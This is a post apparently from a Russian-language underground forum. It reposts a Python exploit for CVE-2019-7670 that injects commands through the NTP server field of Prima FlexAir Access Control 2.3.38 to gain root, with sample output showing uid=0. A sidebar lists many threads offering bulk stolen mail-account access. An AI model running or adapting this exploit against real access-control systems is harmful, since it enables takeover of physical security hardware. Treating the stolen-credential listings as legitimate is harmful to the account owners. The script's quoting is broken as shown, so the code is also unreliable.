Интересно Prima FlexAir Access Control 2.3.38 - Remote Code Execution

GhosTM@n

GhosTM@n

VIP
# Exploit Title: Prima FlexAir Access Control 2.3.38 - Remote Code Execution
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: LiquidWorm
# Vendor Homepage:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

# Software Link:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

# Version: 2.3.38
# Tested on: NA
# CVE : CVE-2019-7670

#!/usr/bin/env python
#
# Authenticated Remote Root Exploit for Prima FlexAir Access Control 2.3.38
# via Command Injection in SetNTPServer request, Server parameter.
#
# CVE: CVE-2019-7670
# Advisory:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

# Paper:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

#
# By Gjoko 'LiquidWorm' Krstic
#
# 18.01.2019
#
################################################## ##########################
#
# $ python ntpcmdinj.py
# [+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]
# [+] Example: python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.
10167847 whoami
#
# $ python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.
11339284 "uname -a"
# Linux Alpha 4.4.16 #1 Mon Aug 29 13:29:40 CEST 2016 armv7l GNU/Linux
#
# $ python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.
11339284 id
# uid=0(root) gid=0(root) groups=0(root),10(wheel)
#
################################################## ##########################
#

import requests
import sys#####

if len(sys.argv) < 4:
print '[+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]'
print '[+] Example: python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.
10167847 whoami\n'
sys.exit()

host = sys.argv[1]
sessionid = sys.argv[2]
commando = sys.argv[3]

url = host+"/bin/sysfcgi.fx"

headers = {"Session-ID" : sessionid, # Muy importante!
"User-Agent" : "Dj/Ole",
"Content-Type" : "application/x-www-form-urlencoded; charset=UTF-8",
"Accept" : "text/html, */*; q=0.01",
"Session-Pc" : "2",
"X-Requested-With" : "XMLHttpRequest",
"Accept-Encoding" : "gzip, deflate",
"Accept-Language" : "en-US,en;q=0.9"}

payload = ("<requests><request name="SetNTPServer">"
"<param name="Server" value="2.europe.p"
"ool.ntp.org;"+commando+">/www/pages/ap"
"p/images/logos/stage.txt|"/></request></"
"requests>")

requests.post(url, headers=headers, data=payload)

e = requests.get(host+"/app/images/logos/stage.txt")
print e.text
 
Для ответа нужно войти/зарегистрироваться
Похожие темы
semsvm 7kx25_MIXED MAILS ACCESS Раздачи и сливы 0
M 15K GERMANY Full Valid Mail Access By MegaCloud 26.11 Раздачи и сливы 0
M 8K Hotmail Full Mail Access By MegaCloud 25.11 Раздачи и сливы 0
M 8K FreshFull Valid Mail Access Mix By MegaCloud 25.11 Раздачи и сливы 0
M 12K Fresh Mail Access Mix By MegaCloud 24.11 Раздачи и сливы 0
M 5K Germany Fresh Mail Access By MegaCloud 24.11 Раздачи и сливы 0
M 3.6K USA✈️Eu Full valid Mail Access By MegaCloud 24.11 Раздачи и сливы 0
M 8K Hotmail Full Mail Access By MegaCloud 23.12 Раздачи и сливы 0
M 25K GERMANY Fresh Mail Access By MegaCloud 23.11 Раздачи и сливы 0
M 13K Fresh Mail Access Mix By MegaCloud 23.11 Раздачи и сливы 0
M 1K Italy Fresh Mail Access By MegaCloud 23.12 Раздачи и сливы 0
M 43K Germany Fresh Mail Access By MegaCloud 21.11 Раздачи и сливы 0
M 31K Full Valid Mail Access Mix By MegaCloud 21.11 Раздачи и сливы 0
M 4.5K Japan Fresh Mail Access By MegaCloud 21.11 Раздачи и сливы 0
M 1.3K Russian Mail Access By MegaCloud 21.11 Раздачи и сливы 0
M 1.1K Usa Full Valid Mail Access By MegaCloud 21.11 Раздачи и сливы 0
M 1.1K Poland Mail Access By MegaCloud 21.111 Раздачи и сливы 0
M 5K Hotmail Fresh Mail Access By MegaCloud 21.11 Раздачи и сливы 0
M 39K Fresh Mail Access Mix By MegaCloud 20.11 Раздачи и сливы 0
M 37K Germany Fresh Mail Access By MegaCloud 20.11 Раздачи и сливы 0
M 3.5 K Fresh full Valid JAPAN Mail Access By MegaCloud 20.11 Раздачи и сливы 0
M 1.5K Poland Full Valid Mail Access By MegaCloud 20.11 Раздачи и сливы 0
M 1.3K Fresh France Full Mail Access By MegaCloud 20.11 Раздачи и сливы 0
M 5.6K Hotmail Full Valid Mail Access By MegaCloud 20.11 Раздачи и сливы 0
M 10K Fresh Mail Access Mix By MegaCloud 19.10 Раздачи и сливы 0
M 1.2K Poland Mail Access By MegaCloud 19.11 Раздачи и сливы 0
M 3.2K USA.EU.ASIA.Ru- Full Valid Mail Access mix By MegaCloud 19.11 Раздачи и сливы 0
M 1K Fresh FRANCE Mail Access By MegaCloud 19.11 Раздачи и сливы 0
M 38K Germany Fresh Mail Access By MegaCloud 18.11 Раздачи и сливы 0
M 13k Full Valid Mail Access Mix By MegaCloud 18.11 Раздачи и сливы 0
M 2K fresh Mail Access Mix By MegaCloud 18.11 Раздачи и сливы 0
M 20K Fresh Mail Access MIX By MegaCloud 17.11 Раздачи и сливы 0
M 70K Germany Fresh Mail Access By MegaCloud 17.11 Раздачи и сливы 0
M 1K Fresh USA Mail Access By MegaCloud 17.11 Раздачи и сливы 0
M 4K Fresh Hotmail - Just Mail Access By MegaCloud 17.11 Раздачи и сливы 0
M 40K Germany Fresh Mail Access By MegaCloud 15.11 Раздачи и сливы 0
M 2.2K Russian Fresh mail Access by MegaCloud 15.11 Раздачи и сливы 0
M 1K Usa Fresh mail Access By Megaloud 15.11 Раздачи и сливы 0
M 2.5K HOTMAIL Fresh Mail Access By MegaCloud 14.11 Раздачи и сливы 0
M 1.3K Poland Full mail Access By megaCloud 14.11 Раздачи и сливы 0
M 3K Japan Fresh Mail Access By MegaCloud 14.11 Раздачи и сливы 0
M 5K USA✈️EU✈️Asia✈️Ru Fresh Mail Access by MegaCloud 14.11 Раздачи и сливы 0
M 24K Full Valid mail Access Mix By MegaCloud 14.11 Раздачи и сливы 0
M 36KGermany Fresh mail Access By MegaCloud 14.11 Раздачи и сливы 0
M 1.5K Usa Full Mail Access By MegaCloud 13.11 Раздачи и сливы 0
M 2.4K Hotmail Full Mail Access By MegaCloud 13.11 Раздачи и сливы 0
M 1.7K Italy Fresh Mail Access By MegaCloud 13.11 Раздачи и сливы 0
M 1.9K France Fresh mail Access By megaCloud 13.11 Раздачи и сливы 0
M 2.5K Russian Full Mail Access By MegaCloud 13.11 Раздачи и сливы 0
M 2K Full Valid Poland Mail Access By MegaCloud 13.11 Раздачи и сливы 0

Название темы